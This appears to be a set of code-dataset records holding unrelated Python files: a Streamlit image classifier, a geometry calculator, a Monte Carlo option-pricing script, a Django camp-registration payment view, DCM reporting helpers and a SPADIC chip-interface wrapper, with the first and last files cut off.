st.empty()\n\n        if not file:\n            show_file.info(\"Please upload an image file : {}\".format(' '.join(['png', 'jpg'])))\n            return\n        content = file.getvalue()\n\n        if isinstance(file, BytesIO):\n            img = PILImage.create(file)\n            pred,pred_idx,probs = learn_inf.predict(img)\n            prediction = f'Prediction: {pred}; Probability: {probs[pred_idx]:.04f}'\n            st.write(prediction)\n            show_file.image(file)\n        \n        else:\n            df = pd.read_csv(file)\n            st.dataframe(df.head(2))\n        \n        file.close()\n\nif __name__ == \"__main__\":\n    app = FileUpload()\n    FileUpload.app()","sub_path":"StreamlitDeploy.py","file_name":"StreamlitDeploy.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"223254517","text":"print(\"### 2D Shape Calculator ###\")\nprint(\"You can calculate the Area & Perimeter of 2D shapes\")\nprint(\"L = Area\")\nprint(\"K = Perimeter\")\njenisKalkulator = str(input(\"Enter code : \")).lower()\n\nif jenisKalkulator == \"l\":\n    print(\"You chose to calculate Area\")\n    print(\"CODES :\")\n    print(\"1. Square\")\n    print(\"2. Rectangle\")\n    print(\"3. Parallelogram\")\n    print(\"4. Trapezoid\")\n    print(\"5. Kite\")\n    print(\"6. Triangle\")\n    print(\"7. Rhombus\")\n    print(\"8. Circle\")\n    jenisBangun = int(input(\"Enter code : \"))\n\n    if jenisBangun == 1:\n        s = int(input(\"Side length : \"))\n\n        luasPersegi = (s * s)\n        print(\"Square area : \", luasPersegi)\n\n    if jenisBangun == 2:\n        p = int(input(\"Length : \"))\n        l = int(input(\"Width : \"))\n\n        luasPersegipanjang = (p * l)\n        print(\"Rectangle area : \", luasPersegipanjang)\n\n    if jenisBangun == 3:\n        a = int(input(\"Base : \"))\n        t = int(input(\"Height : \"))\n\n        luasJajargenjang = (a * t)\n        print(\"Parallelogram area\", luasJajargenjang)\n\n    if jenisBangun == 4:\n        jumsissej = int(input(\"Sum of parallel sides : \"))\n        t = int(input(\"Height : \"))\n\n        luasTrapesium = (0.5 * jumsissej * t)\n        print(\"Trapezoid area : \", luasTrapesium)\n\n    if jenisBangun == 5:\n        d1 = int(input(\"Diagonal 1 : \"))\n        d2 = int(input(\"Diagonal 2 : \"))\n\n        luasLayang = (0.5 * d1 * d2)\n        print(\"Kite area : \", luasLayang)\n\n    if jenisBangun == 6:\n        a = int(input(\"Base : \"))\n        t = int(input(\"Height : \"))\n\n        luasSegitiga = (0.5 * a * t)\n        print(\"Triangle area : \", luasSegitiga)\n\n    if jenisBangun == 7:\n        d1 = int(input(\"Diagonal 1 : \"))\n        d2 = int(input(\"Diagonal 2 : \"))\n\n        luasBelah = (0.5 * d1 * d2)\n        print(\"Rhombus area : \", luasBelah)\n\n    if jenisBangun == 8:\n        r = int(input(\"Circle radius : \"))\n\n        luasLingkaran = (3.14 * r * r)\n        print(\"Circle area : \", luasLingkaran)\n\n\nif jenisKalkulator == \"k\":\n    print(\"You chose to calculate Perimeter\")\n    print(\"CODES :\")\n    print(\"1. Square\")\n    print(\"2. Rectangle\")\n    print(\"3. Parallelogram\")\n    print(\"4. Trapezoid\")\n    print(\"5. Kite\")\n    print(\"6. Triangle\")\n    print(\"7. Rhombus\")\n    print(\"8. Circle\")\n    jenisBangun = int(input(\"Enter code : \"))\n\n    if jenisBangun == 1:\n        s = int(input(\"Side length : \"))\n\n        kelPersegi = (4 * s)\n        print(\"Square perimeter : \", kelPersegi)\n\n    if jenisBangun == 2:\n        p = int(input(\"Length : \"))\n        l = int(input(\"Width : \"))\n\n        kelPersegipanjang = (2 * (p + l))\n        print(\"Rectangle perimeter : \", kelPersegipanjang)\n\n    if jenisBangun == 3:\n        s1 = int(input(\"Right side : \"))\n        s2 = int(input(\"Left side : \"))\n        s3 = int(input(\"Top side : \"))\n        s4 = int(input(\"Bottom side : \"))\n\n        kelJajargenjang = (s1 + s2 + s3 + s4)\n        print(\"Parallelogram perimeter\", kelJajargenjang)\n\n    if jenisBangun == 4:\n        s1 = int(input(\"Side 1 : \"))\n        s2 = int(input(\"Side 2 : \"))\n        s3 = int(input(\"Side 3 : \"))\n        s4 = int(input(\"Side 4 : \"))\n\n        kelTrapesium = (s1 + s2 + s3 + s4)\n        print(\"Trapezoid perimeter : \", kelTrapesium)\n\n    if jenisBangun == 5:\n        ab = int(input(\"AB : \"))\n        bc = int(input(\"BC : \"))\n\n        kelLayang = (2 * (ab + bc))\n        print(\"Kite perimeter : \", kelLayang)\n\n    if jenisBangun == 6:\n        a = int(input(\"Base : \"))\n        t = int(input(\"Height : \"))\n        d = int(input(\"Diagonal : \"))\n\n        kelSegitiga = (a + t + d)\n        print(\"Triangle perimeter : \", kelSegitiga)\n\n    if jenisBangun == 7:\n        s = int(input(\"Side length : \"))\n\n        kelBelah = (4 * s)\n        print(\"Rhombus perimeter : \", kelBelah)\n\n    if jenisBangun == 8:\n        d = int(input(\"Circle diameter : \"))\n\n        kelLingkaran = (3.14 * d)\n        print(\"Circle perimeter : \", kelLingkaran)","sub_path":"Bangun_Datar.py","file_name":"Bangun_Datar.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"204874690","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\n#A. 
Buchner (2015) Equilibrium option pricing: A Monte Carlo approach\r\n\r\nimport os\r\nimport math\r\nimport numpy as np\r\nnp.set_printoptions(precision=3)\r\nimport itertools as it\r\nimport pandas as pd\r\nfrom time import time\r\n# Inverse of the CDF of the standard normal distribution \r\nfrom scipy.stats import norm\r\n#ENTER PATH:\r\npath =r'D:\\Google Drive\\M2 P1\\Reference\\Theorie Option_MYannick\\Articles\\CODE'\r\n\r\n\r\n#Heston(1993) Diffusion Parameters\r\nv0 = 0.1\r\nkappa_v = 0.5\r\n# sigma_v = 0.05\r\nrho_vs = -0.5\r\ntheta_v = 0.1\r\nS0 = 100\r\nmu_s = 0.1241\r\n\r\n#Market Price Diffusion Model Parameters \r\nM0 = 100\r\nmu_m = 0.1\r\nsigma_m = 0.12\r\nrho_ms = 0.5\r\nrho_mv = 0\r\n\r\n#General Parameters Simulation\r\nT = 1\r\nnsteps = 250\r\n# paths_list = [1000, 10000, 100000] #1000, 10000, 100000\r\n# b_list = [1, 3, 5, 10] #1, 3, 5, 10\r\n# K_list = [80, 100, 120] #80, 100, 120\r\nnp.random.seed(200000)\r\n# volatility = ['stochastic', 'constant'] #'stochastic', 'constant'\r\n# option_type = ['Call', 'Put'] #'Call', 'Put'\r\n\r\n#Square root diffusion\r\ndef SRD_generate_paths(v0, kappa_v, theta_v, sigma_v, T, nsteps, I, rand,\r\n row, cho_matrix) :\r\n \r\n dt = T / nsteps\r\n v = np.zeros((nsteps + 1, I), dtype=np.float)\r\n v[0] = v0\r\n v_p = np.zeros_like(v)\r\n v_p[0] = v0\r\n sdt = math.sqrt(dt)\r\n for t in range(1, nsteps + 1):\r\n ran = np.dot(cho_matrix, rand[:, t])\r\n v_p[t] = (v_p[t - 1] + kappa_v *\r\n (theta_v - np.maximum(0, v_p[t - 1])) * dt +\r\n np.sqrt(np.maximum(0, v_p[t - 1])) * sigma_v * ran[row] * sdt)\r\n v[t] = np.maximum(0, v_p[t])\r\n return(v)\r\n\r\n#Stock price diffusion\r\ndef H93_generate_paths(S0, mu_s, v, T, nsteps, I, rand, row, volatility,\r\n cho_matrix):\r\n \r\n dt = T / nsteps\r\n S = np.zeros((nsteps + 1, I), dtype=np.float)\r\n S[0] = S0\r\n sdt = math.sqrt(dt)\r\n for t in range(1, nsteps + 1):\r\n ran = np.dot(cho_matrix, rand[:, t])\r\n if volatility == 'stochastic':\r\n S[t] = S[t - 1] * (1 + mu_s * dt + np.sqrt(v[t - 1]) *\r\n ran[row] * sdt)\r\n elif volatility == 'constant':\r\n S[t] = S[t - 1] * (1 + mu_s * dt + np.sqrt(v0) *\r\n ran[row] * sdt)\r\n return(S)\r\n \r\n#Market price diffusion\r\ndef Mkt_generate_paths(M0, mu_m, sigma_m, T, nsteps, I, rand, row, cho_matrix):\r\n \r\n dt = T / nsteps\r\n M = np.zeros((nsteps + 1, I), dtype=np.float)\r\n M[0] = M0\r\n sdt = math.sqrt(dt)\r\n for t in range(1, nsteps + 1):\r\n ran = np.dot(cho_matrix, rand[:, t])\r\n M[t] = M[t - 1] * (1 + mu_m * dt + sigma_m * ran[row] * sdt)\r\n return(M)\r\n \r\n#Random number generator\r\ndef random_number_generator(nsteps, I):\r\n rand = np.random.standard_normal((3, nsteps + 1, I))\r\n return(rand)\r\n\r\n\r\n#VALUATION\r\n#=========\r\n\r\nt0 = time()\r\n \r\nresults = pd.DataFrame()\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n # Correlation Matrix\r\n covariance_matrix = np.zeros((3, 3), dtype=np.float)\r\n covariance_matrix[0] = [1.0, rho_vs, rho_ms]\r\n covariance_matrix[1] = [rho_vs, 1.0, rho_mv]\r\n covariance_matrix[2] = [rho_ms, rho_mv, 1.0]\r\n cho_matrix = np.linalg.cholesky(covariance_matrix)\r\n\r\n def final_result(option_type,paths_list, b_list, K_list, volatility,sigma_v): \r\n results = pd.DataFrame() \r\n for alpha in it.product(option_type,paths_list, b_list, K_list, volatility):\r\n print('\\n', alpha, '\\n')\r\n opt,I, b, K, vol= alpha\r\n \r\n #memory clean-up\r\n v, S, M, rand, st_dev = 0.0, 0.0, 0.0, 0.0, 0.0\r\n C_bar, R_bar, pi, r_m, r_mi = 0.0, 0.0, 0.0, 0.0, 0.0\r\n \r\n #random numbers\r\n rand = 
random_number_generator(nsteps, I)\r\n            #volatility paths\r\n            v = SRD_generate_paths(v0, kappa_v, theta_v, sigma_v, T,\r\n                                   nsteps, I, rand, 1, cho_matrix)\r\n            #stock price paths\r\n            S = H93_generate_paths(S0, mu_s, v, T, nsteps, I, rand, 0,\r\n                                   vol, cho_matrix)\r\n            #market price paths\r\n            M = Mkt_generate_paths(M0, mu_m, sigma_m, T, nsteps, I, rand, 2,\r\n                                   cho_matrix)\r\n            \r\n            #market return over [0,T]\r\n            r_m = M[nsteps, :] / M[0, :] - 1\r\n            #MC estimator\r\n            r_mi = (1 + r_m)**(1 - b)\r\n            R_bar = np.sum(r_mi) / I\r\n            if opt == 'Call':\r\n                pi = np.maximum(S[-1] - K, 0) / (1 + r_m)**b\r\n            elif opt == 'Put':\r\n                pi = np.maximum(-S[-1] + K, 0) / (1 + r_m)**b\r\n            C0 = np.sum(pi) / np.sum(r_mi)\r\n            #standard deviation\r\n            C_bar = np.sum(pi) / I\r\n            st_dev = (1 / (I * R_bar**2)) * np.sum((pi - r_mi *\r\n                                                    C_bar / R_bar)**2)\r\n            st_dev = np.sqrt(st_dev) / np.sqrt(I)\r\n            #Confidence intervals (norm.ppf(1 - 0.05/2) is the positive 97.5% quantile)\r\n            C0_inf = C0 - norm.ppf(1 - 0.05/2) * st_dev\r\n            C0_sup = C0 + norm.ppf(1 - 0.05/2) * st_dev\r\n            \r\n            res = pd.DataFrame({'paths': I, 'strike': K,\r\n                                'option value': C0,'stdev': st_dev,\r\n                                'IC inf': C0_inf,'IC sup': C0_sup,\r\n                                'relative risk aversion' : b, 'option type':\r\n                                opt, 'volatility': vol}, index= [0,])\r\n            \r\n            results = results.append(res, ignore_index=True)\r\n        return(results)\r\n\r\n\r\n# Create function to save result to working directory\r\n    def save_result(res, file_name):\r\n        res.to_csv(os.path.join(path, file_name), header=True, index=None, sep=';')\r\n\r\n\r\n# RUN and SAVE RESULTS\r\n    table1 = final_result(['Call'],[1000, 10000,100000],[5],[80,100,120],['stochastic'],[0.05])\r\n    table2 = final_result(['Call','Put'],[100000],[1,3,5,10],[80,100,120],['stochastic'],[0.05])\r\n    table3 = final_result(['Call','Put'],[100000],[3,5],[80,100,120],['constant','stochastic'],[0.2])\r\n\r\n    save_result(table1, 'Table 1.csv')\r\n    save_result(table2, 'Table 2.csv')\r\n    save_result(table3, 'Table 3.csv')\r\n    \r\n\r\n    \r\n    \r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n    \r\n    \r\n\r\n","sub_path":"Buchner2015-pricing-new.py","file_name":"Buchner2015-pricing-new.py","file_ext":"py","file_size_in_byte":6197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"602119847","text":"from django.shortcuts import render\r\nfrom django.http import HttpResponseRedirect\r\nfrom django.core.urlresolvers import reverse\r\n\r\nfrom djforms.music.theatre.summer_camp import BCC, TO_LIST, REG_FEE\r\nfrom djforms.processors.models import Contact, Order\r\nfrom djforms.processors.forms import TrustCommerceForm\r\nfrom djforms.music.theatre.summer_camp.forms import RegistrationForm\r\n\r\nfrom djtools.utils.mail import send_mail\r\n\r\n\r\ndef registration(request):\r\n    status = None\r\n    msg = None\r\n    if request.POST:\r\n        form_reg = RegistrationForm(request.POST)\r\n        if form_reg.is_valid():\r\n            contact = form_reg.save()\r\n            # credit card payment\r\n            if contact.payment_method == 'Credit Card':\r\n                order = Order(\r\n                    total=REG_FEE,auth='sale',status='In Process',\r\n                    operator='DJMusicTheatreCamp'\r\n                )\r\n                form_proc = TrustCommerceForm(order, contact, request.POST)\r\n                if form_proc.is_valid():\r\n                    r = form_proc.processor_response\r\n                    order.status = r.msg['status']\r\n                    order.transid = r.msg['transid']\r\n                    order.cc_name = form_proc.name\r\n                    order.cc_4_digits = form_proc.card[-4:]\r\n                    order.save()\r\n                    contact.order.add(order)\r\n                    order.reg = contact\r\n                    sent = send_mail(\r\n                        request, TO_LIST,\r\n                        'Music Theatre summer camp registration',\r\n                        contact.email,\r\n                        
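Why the Cholesky factor in the Buchner record produces the right joint draws: if z is a vector of independent standard normals and L L^T = C, then L z has covariance C. A quick numerical self-check using the script's own correlation matrix:

import numpy as np

C = np.array([[1.0, -0.5, 0.5],
              [-0.5, 1.0, 0.0],
              [0.5, 0.0, 1.0]])       # rho_vs, rho_ms, rho_mv as in the script
L = np.linalg.cholesky(C)
z = np.random.standard_normal((3, 200000))
print(np.corrcoef(L @ z))             # approximately reproduces C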
'music/theatre/summer_camp/registration_email.html',\r\n order, BCC\r\n )\r\n order.send_mail = sent\r\n order.save()\r\n return HttpResponseRedirect(\r\n reverse('music_theatre_summer_camp_success')\r\n )\r\n else:\r\n r = form_proc.processor_response\r\n if r:\r\n order.status = r.status\r\n else:\r\n order.status = 'Form Invalid'\r\n order.cc_name = form_proc.name\r\n if form_proc.card:\r\n order.cc_4_digits = form_proc.card[-4:]\r\n order.save()\r\n contact.order.add(order)\r\n status = order.status\r\n order.reg = contact\r\n else:\r\n order = Order(\r\n total=REG_FEE,auth='COD',status='Pay later',\r\n operator='DJMusicTheatreCamp'\r\n )\r\n order.save()\r\n contact.order.add(order)\r\n order.reg = contact\r\n sent = send_mail(\r\n request, TO_LIST,\r\n 'Music Theatre summer camp registration',\r\n contact.email,\r\n 'music/theatre/summer_camp/registration_email.html',\r\n order, BCC\r\n )\r\n order.send_mail = sent\r\n order.save()\r\n return HttpResponseRedirect(\r\n reverse('music_theatre_summer_camp_success')\r\n )\r\n else:\r\n if request.POST.get('payment_method') == 'Credit Card':\r\n form_proc = TrustCommerceForm(None, request.POST)\r\n form_proc.is_valid()\r\n else:\r\n form_proc = TrustCommerceForm()\r\n else:\r\n form_reg = RegistrationForm()\r\n form_proc = TrustCommerceForm()\r\n\r\n return render(\r\n request,\r\n 'music/theatre/summer_camp/registration_form.html',\r\n {\r\n 'form_reg': form_reg,'form_proc':form_proc,\r\n 'status':status,'msg':msg,\r\n }\r\n )\r\n","sub_path":"djforms/music/theatre/summer_camp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"21606804","text":"#!/usr/local/bin/python3\n\nimport os\nimport csv\nimport time\nimport pandas\nimport numpy\nimport logging\nfrom rpy2 import robjects as ro\nfrom datetime import datetime, timedelta\n\n# local imports\nfrom datagrabber import DCMGrabber\n\nclass APIDownloadError(Exception):\n\tpass\n\n\"\"\"HELPER METHODS\"\"\"\ndef parse_from_ms_timestamp(ms_timestamp):\n\treturn datetime.fromtimestamp(int(ms_timestamp)/1000.0)\n\n\"\"\"GENERAL DCM METHODS\"\"\"\n\ndef create_report(api, template):\n\tresponse = api.request(method=\"post\", url=api.urls.report, urlargs=(api.profile_id,), json=template, headers={'content-type': 'application/json'})\n\tif response.status_code == 200:\n\t\treturn response.json()[\"id\"]\n\telse:\n\t\traise Exception(response.text)\n\ndef delete_report(api, report_id):\n\tresponse = api.request(method=\"delete\", url=api.urls.report_get, urlargs=(api.profile_id,report_id))\n\treturn response\n\n\ndef run_report(api, report_id):\n\tlogging.info(\"Running DCM Report Profile #%s Report #%s\" % (api.profile_id, report_id))\n\tresponse = api.request(url=api.urls.report_run, method=\"post\", urlargs=(api.profile_id, report_id))\n\tif response.status_code == 200:\n\t\tdata = response.json()\n\t\treturn data[\"id\"]\n\telse:\n\t\traise APIDownloadError(\"DCM API Report Did Not Run\")\n\ndef check_report(api, report_id, file_id):\n\tlogging.debug(\"Checking on DCM Report Profile #%s Report #%s File #%s\" % (api.profile_id, report_id, file_id))\n\tresponse = api.request(url=api.urls.report_check, urlargs=(api.profile_id, report_id, file_id))\n\tif response.status_code == 200:\n\t\tdata = response.json()\n\t\tif data[\"status\"] == \"REPORT_AVAILABLE\":\n\t\t\treturn data[\"urls\"][\"apiUrl\"]\n\t\telif data[\"status\"] == \"PROCESSING\":\n\t\t\treturn 
None\n\t\telse:\n\t\t\traise APIDownloadError(\"DCM report #%s file #%s failed with condition %s\" % ( report_id, file_id, data[\"status\"] ) )\n\telif str(response.status_code)[0] in (\"3\",\"4\"):\n\t\traise APIDownloadError(\"DCM report #%s file #%s not found. Status: %s\" % (report_id, file_id, response.status_code))\n\telse:\n\t\treturn None\n\ndef pickup_report(api, resource_url, fname):\n\tlogging.info(\"Downloading DCM Report from URL %s\" % (resource_url))\n\treturn api.request_download(url=resource_url, fname=str(fname))\n\n\ndef recover_report(api, report_id, **dt_args):\n\n\tif len(dt_args) == 0:\n\t\t# defaults to 30 minute lookback window\n\t\tdt_args = {\"minutes\":30}\n\n\tresponse = api.request(method='get', url=api.urls.report_listfiles, urlargs=(api.profile_id, report_id), params={\"sortField\":\"LAST_MODIFIED_TIME\", \"sortOrder\":\"DESCENDING\"})\n\n\tif response.status_code == 200:\n\t\tdata = response.json()\n\telse:\n\t\traise APIDownloadError(\"Report File List Not Found\")\n\n\tnow = datetime.now()\n\n\tfor item in data[\"items\"]:\n\t\ttimestamp = parse_from_ms_timestamp(item[\"lastModifiedTime\"])\n\t\tif item[\"status\"] == \"PROCESSING\" or ( item[\"status\"] == \"REPORT_AVAILABLE\" and now - timestamp < timedelta(**dt_args) ):\n\t\t\treturn item[\"id\"]\n\n\treturn None\n\t\t\n\ndef get_dcm_data(api, report_id, fname, wait=30, timeout=7200, force_new_report=False):\n\tlogging.info(\"Authenticating DCM API\")\n\tapi.authenticate()\n\tmax_attempts = timeout / wait\n\tattempts = 0\n\n\tif force_new_report:\n\t\tfile_id = run_report(api, report_id)\n\telse:\n\t\tfile_id = recover_report(api, report_id, hours=12)\n\t\tif file_id is None:\n\t\t\tfile_id = run_report(api, report_id)\n\n\twhile attempts <= max_attempts:\n\t\tattempts += 1\n\t\tresource = check_report(api, report_id, file_id)\n\t\tif resource is not None:\n\t\t\treturn pickup_report(api=api, resource_url=resource, fname=fname)\n\t\telse:\n\t\t\tlogging.debug(\"Waiting %s seconds\" % wait)\n\t\t\ttime.sleep(wait)\n\traise APIDownloadError(\"Maximum DCM Download Attempts Exceeded for report #%s file#%s\\nTimeout: %s, Attempts: %s\" % (report_id, file_id, timeout, attempts) )\n\n\n\"\"\"DIRTY DATA PULL METHODS\"\"\"\n\ndef generate_report_template(advertiser_id):\n\treturn {\n\t\t\"type\": \"STANDARD\",\n\t\t\"criteria\": {\n\t\t\t\"dateRange\": {\n\t\t\t \"relativeDateRange\": \"LAST_30_DAYS\"\n\t\t\t },\n\t\t\t\"dimensionFilters\": [\n\t\t\t\t{\n\t\t\t\t\t\"dimensionName\": \"dfa:advertiser\",\n\t\t\t\t\t\"matchType\": \"EXACT\",\n\t\t\t\t\t\"id\": str(advertiser_id)\n\t\t\t\t\t}\n\t\t\t\t],\n\t\t\t\"dimensions\": [\n\t\t\t\t{\"name\": \"dfa:date\"},\n\t\t\t\t{\"name\": \"dfa:country\"},\n\t\t\t\t{\"name\": \"dfa:state\"},\n\t\t\t\t{\"name\": \"dfa:dmaRegion\"},\n\t\t\t\t{\"name\": \"dfa:zipCode\"},\n\t\t\t\t{\"name\": \"dfa:advertiserId\"},\n\t\t\t\t{\"name\": \"dfa:campaignId\"},\n\t\t\t\t{\"name\": \"dfa:siteId\"},\n\t\t\t\t{\"name\": \"dfa:placementId\"},\n\t\t\t\t{\"name\": \"dfa:activityGroupId\"},\n\t\t\t\t{\"name\": \"dfa:activityId\"},\n\t\t\t\t{\"name\": \"dfa:creativeId\"},\n\t\t\t\t{\"name\": \"dfa:adId\"},\n\t\t\t\t{\"name\": \"dfa:adType\"},\n\t\t\t\t{\"name\": \"dfa:creativeType\"},\n\t\t\t\t{\"name\": \"dfa:placementCostStructure\"},\n\t\t\t\t{\"name\": \"dfa:platformType\"}\n\t\t\t ],\n\t\t\t\"metricNames\": 
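The run_report / check_report / pickup_report trio above is a poll-until-ready loop; the same shape in isolation, with check_fn and fetch_fn as stand-ins for the DCM-specific calls:

import time

def poll(check_fn, fetch_fn, wait=30, timeout=7200):
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        resource = check_fn()      # None means the report is still processing
        if resource is not None:
            return fetch_fn(resource)
        time.sleep(wait)
    raise TimeoutError('resource never became available')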
[\n\t\t\t\t\"dfa:impressions\",\n\t\t\t\t\"dfa:clicks\",\n\t\t\t\t\"dfa:activeViewEligibleImpressions\",\n\t\t\t\t\"dfa:activeViewMeasurableImpressions\",\n\t\t\t\t\"dfa:activeViewViewableImpressions\",\n\t\t\t\t\"dfa:activityClickThroughConversions\",\n\t\t\t\t\"dfa:activityViewThroughConversions\",\n\t\t\t\t\"dfa:mediaCost\"\n\t\t\t ]\n\t\t\t},\n\t\t\t\"format\": \"CSV\",\n\t\t\t\"name\": \"_\".join([\"BulkCollection\", str(advertiser_id), datetime.now().strftime(\"%Y-%m-%d\")])\n\t\t\t}\n\ndef extract_metadata(metadata_file, r_script, output_dir=None, remove=False):\n\t\n\tif output_dir is None:\n\t\toutput_dir == \"NULL\"\n\n\texe = \"\"\"source( \"{r_script}\" )\n\textract_metadata( \"{metadata_file}\", \"{output_dir}\" )\n\t\"\"\".format(metadata_file=metadata_file, r_script=r_script, output_dir=output_dir)\n\tfpaths = tuple(ro.r(exe))\n\n\tif remove: os.unlink(metadata_file)\n\n\treturn fpaths\n\ndef clean_up_data(data_file, r_script, output_dir=None, remove=False):\n\n\tif output_dir is None:\n\t\toutput_dir == \"NULL\"\n\n\texe = \"\"\"source( \"{r_script}\" )\n\tclean_main_data( \"{data_file}\", \"{output_dir}\" )\n\t\"\"\".format(data_file=data_file, r_script=r_script, output_dir=output_dir)\n\tfpath = tuple(ro.r(exe))[0]\n\n\tif remove: os.unlink(data_file)\n\n\treturn fpath\n\ndef get_dcm_metadata(api, report_id, force_new_report=False):\n\n\tmetadata_file = get_dcm_data(api, report_id, 'metadata', wait=5, force_new_report=force_new_report)\n\n\treturn metadata_file\n\ndef get_dcm_advertiser_list(metadata_file, remove=False):\n\n\tadvertiser_ids = []\n\n\twith open(metadata_file) as f_in:\n\t\tskip = 8 # assumes header is 9 lines long\n\t\treader = csv.reader(f_in)\n\t\tfor i, row in enumerate(reader):\n\t\t\tif i <= skip:\n\t\t\t\tcontinue\n\t\t\tif row[0] != \"Grand Total:\":\n\t\t\t\tadvertiser_ids.append(row[0])\n\n\tif remove: os.unlink(metadata_file)\n\n\treturn tuple(set(advertiser_ids))\n\n\nif __name__==\"__main__\":\n\n\tfrom pprint import PrettyPrinter\n\tpp = PrettyPrinter(indent=1).pprint\n\n\tapi = DCMGrabber(\"google-dcm.dgconf\", 'google-dcm')\n\t# print(\"Authenticated\", api.authenticate())\n\n\t# test generate and delete report\n\t# temp = generate_report_template(3105496)\n\t# resp = delete_report(api, 35614433)\n\n\t# print(resp)\n\n\t# test generate, download, delete for each advertiser\n\t# ad_ids = get_dcm_advertiser_list(api, report_id=34834189, remove=False, force_new_report=False)\n\t# print(ad_ids[0])\n\n\t# temp = generate_report_template(3105496)\n\t# report_id = create_report(api, temp)\n\t# print(report_id)\n\t# resp = delete_report(api, 35614433)\n\n\t# strt = time.time()\n\t# for aid in ad_ids[:2]:\n\t# \tprint(\"Generating Template\", aid)\n\t# \ttemplate = generate_report_template(aid)\n\t# \tprint(\"Creating Report\", aid)\n\t# \treport_id = create_report(api, template)\n\t# \tprint(\"Running Report\", report_id)\n\t# \tdata_file = get_dcm_data(api, report_id, fname=aid, wait=15)\n\t# \tprint(\"Output File\", data_file)\n\t# \tdelete_report(api, report_id)\n\n\t# endrt = time.time()\n\n\t# print(\"total time:\",strt-endrt)\n\n\t# test recovering existing reports\n\t# recv = recover_report(api, 34834189, minutes=5)\n\t# print(recv)\n\n\t# test parse metadata\n\t# header_row = (\"advertiser_id\",\"advertiser\",\"campaign_id\",\"campaign\",\"site_id\",\"site\",\"placement_id\",\"placement\",\"activity_group_id\",\"activity_group\",\"activity_id\",\"activity\",\"ad_id\",\"ad\",\"creative_id\",\"creative\",\"impressions\")\n\t# print( 
extract_metadata(\"temp/google-dcm_advertiser-ids_20160108095328.csv\", \"data\") )\n\n\t# test placement parsing\n\t# print( parse_placement(\"data/placement_id.csv\") )\n\n\t# print( extract_metadata(\"temp/google-dcm_advertiser-ids_20160108095328.csv\", \"rscripts/transform.R\", \"doopboop\"))\n\n\t# print( clean_up_data(\"temp/google-dcm_4343044_20160108095402.csv\", \"rscripts/transform.R\", \"doopboop\") )\n","sub_path":"scripts/dcm_methods.py","file_name":"dcm_methods.py","file_ext":"py","file_size_in_byte":8208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"561863599","text":"import threading, Queue\nfrom util import IndexQueue\n\nimport ftdi_cbmnet\nfrom message import MessageSplitter, Message\nfrom registerfile import SpadicRegisterFile\nfrom shiftregister import SpadicShiftRegister\nfrom control import SpadicController\n\n\n# CBMnet control port <-> register file read/write commands\nRF_WRITE = 1\nRF_READ = 2\n\n\nclass Spadic(ftdi_cbmnet.FtdiCbmnetThreaded):\n \"\"\"\n Wrapper for CBMnet interface <-> SPADIC communication.\n \n Arguments:\n reset - flag for initial reset of the chip configuration\n load - name of .spc configuration file to be loaded\n\n Optional debugging keyword arguments:\n _debug_out - file-like object where debug output is sent to\n _debug_ftdi - flag for logging FTDI communication\n _debug_cbmif - flag for logging CBMnet interface communication\n \"\"\"\n def __init__(self, reset=False, load=None, **kwargs):\n try:\n ftdi_cbmnet.FtdiCbmnetThreaded.__init__(self)\n except IOError:\n raise # TODO enter offline mode\n\n # here we enforce arguments to be passed as keyword arguments\n debug_kwargs = ['_debug_out', '_debug_ftdi', '_debug_cbmif']\n for arg in debug_kwargs:\n if arg in kwargs:\n setattr(self, arg, kwargs[arg])\n\n self.readout_enable(0)\n\n # message splitters and output queues for groups A and B\n self._dataA_splitter = MessageSplitter()\n self._dataB_splitter = MessageSplitter()\n self._dataA_queue = Queue.Queue()\n self._dataB_queue = Queue.Queue()\n\n # register read result Queue (indexable)\n self._ctrl_queue = IndexQueue()\n\n # data reader thread\n self._recv_worker = threading.Thread(name=\"recv worker\")\n self._recv_worker.run = self._recv_job\n self._recv_worker.daemon = True\n self._recv_worker.start()\n\n # higher level register file access\n def rf_write_gen(name, addr):\n def write(value):\n self.write_register(addr, value)\n return write\n def rf_read_gen(name, addr):\n def read():\n return self.read_register(addr)\n return read\n self._registerfile = SpadicRegisterFile(rf_write_gen, rf_read_gen)\n\n # higher level shift register access\n self._shiftregister = SpadicShiftRegister(self.write_register,\n self.read_register)\n\n # highest level configuration controller\n self.control = SpadicController(self._registerfile,\n self._shiftregister, reset, load)\n\n self.readout_enable(1)\n\n\n def _recv_job(self):\n \"\"\"Process data received from the CBMnet interface.\"\"\"\n while not self._stop.is_set():\n try:\n (addr, words) = self._cbmif_read()\n except TypeError: # read result is None\n continue\n\n if addr == ftdi_cbmnet.ADDR_DATA_A:\n for m in self._dataA_splitter(words):\n self._dataA_queue.put(m)\n\n elif addr == ftdi_cbmnet.ADDR_DATA_B:\n for m in self._dataB_splitter(words):\n self._dataB_queue.put(m)\n\n elif addr == ftdi_cbmnet.ADDR_CTRL:\n [reg_addr, reg_val] = words\n self._ctrl_queue.put(reg_addr, reg_val)\n\n\n def __exit__(self, *args):\n \"\"\"Bring all 
threads to halt.\"\"\"\n if not hasattr(self, '_stop'):\n return\n if not self._stop.is_set():\n self._stop.set()\n ftdi_cbmnet.FtdiCbmnetThreaded.__exit__(self)\n self._recv_worker.join()\n # maybe do:\n #while self._recv_worker.is_alive():\n # self._recv_worker.join(timeout=1)\n if self._debug_cbmif:\n self._debug(\"[main]\", self._recv_worker.name, \"finished\")\n\n \n #----------------------------------------------------------------\n # access register file\n #----------------------------------------------------------------\n def write_register(self, address, value):\n \"\"\"Write a value into a register.\"\"\"\n addr = ftdi_cbmnet.ADDR_CTRL\n words = [RF_WRITE, address, value]\n self._cbmif_write(addr, words)\n\n def read_register(self, address, clear_skip=False,\n request_skip=False, request_only=False):\n \"\"\"Read the value from a register.\"\"\"\n if not request_skip:\n if not clear_skip:\n # Workaround for 